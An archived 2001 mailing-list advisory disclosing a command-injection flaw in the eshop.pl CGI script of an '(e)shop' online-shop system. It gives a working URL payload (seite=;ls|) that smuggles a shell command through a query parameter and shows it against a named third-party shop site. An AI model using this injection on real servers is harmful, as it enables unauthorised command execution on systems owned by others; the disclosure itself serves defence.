|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Kernel|X| (secure
punkass.com)Date: Sat Sep 15 2001 - 19:44:51 CDT
------------[ advisory ]------------
name: (e)shop Online-Shop System
author:
WEBDISCOUNT, Inh. Michael Boehme
Problem:
Script doesnt check for symbol ";". any user
can execute any *nix commands on webserver.
exploit:
host/cgi-bin/eshop.pl?seite=;ls|
ex.
http://www.azl-mobilfunk.com/cgi-bin/eshop.pl?seite=;ls|
Bug found by Kernel|X|
[ twisted metal ]
E-Mail: [securepunkass.com]
[kernelxtmgroup.sh]
WWW: [ www.tmgroup.sh ]
------------
Thank you for using Anonymous mail system! message sent from www.tmgroup.sh
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]